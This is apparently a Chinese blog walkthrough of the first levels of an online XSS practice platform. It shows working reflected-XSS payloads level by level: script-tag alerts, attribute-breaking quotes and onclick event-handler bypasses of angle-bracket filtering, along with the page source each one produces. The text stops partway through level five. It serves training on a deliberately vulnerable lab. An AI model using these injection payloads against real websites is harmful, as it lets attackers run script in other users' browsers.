web安全—XSS攻击(二)

本文通过在线XSS平台进行实战演练,详细介绍了如何利用不同payload逐关突破,涉及事件触发、字符过滤与绕过、HTML实体转换等技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

练习了DVWA靶场中的XSS了解了一些原理和攻击方式,接下来就用在线XSS平台开始实战一番。

在线XSS平台地址
在这里插入图片描述
第一关肯定不会太难,就用最常用的攻击语句试试。

<script>alert(/hacker/)</script>

在这里插入图片描述
第二关
在这里插入图片描述
就先把这个最简单的攻击语句放上去看看

<script>alert(/hacker/)</script>

没有出现弹窗,看下页面源代码。

<input name=keyword  value="<script>alert(/hacker/)</script>">
<input type=submit name=submit value="搜索"/>

观察代码,要想我们的语句起作用,就需要把前面的<input>标签给闭合掉。
那就输入这样的语句:
payload:

"><script>alert(/hacker/)</script>

在这里插入图片描述
第三关
在这里插入图片描述
还是那个套路,放上最常用的语句试试
没有成功,看看页面源代码

<input name=keyword  value='&lt;script&gt;alert(/hacker/)&lt;/script&gt;'>
<input type=submit name=submit value=搜索 />

发现输入的<和>被转义了
既然过滤了<和>,那就换一种攻击方式,用onclick 事件,onclick 事件会在元素被点击时发生。onclick 事件直接包含在<>内,并且可以被执行。再观察页面源代码,是单引号,那就在前面加'把value给闭合掉。
payload:

'οnclick='javascript:alert(/hacker/)'

输入之后,再点击一下输入框
在这里插入图片描述
第四关
在这里插入图片描述
先拿一个攻击语句测试下,再看看页面源代码。

<input name=keyword  value="scriptalert(/hacker/)/script">
<input type=submit name=submit value=搜索 />

观察到<和>直接被过滤掉了
那就用onclick 事件,这里是双引号,那就在前面输入",把value给闭合掉。
payload:

"οnclick="javascript:alert(/hacker/)"

在这里插入图片描述
第五关
在这里插入图片描述
还是那个套路,先输入常用的看看,没有弹窗,看看页面源代码。

<input name=keyword  value=""o_nclick="javascript:alert(/xss/)"">
<input type=submit name
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值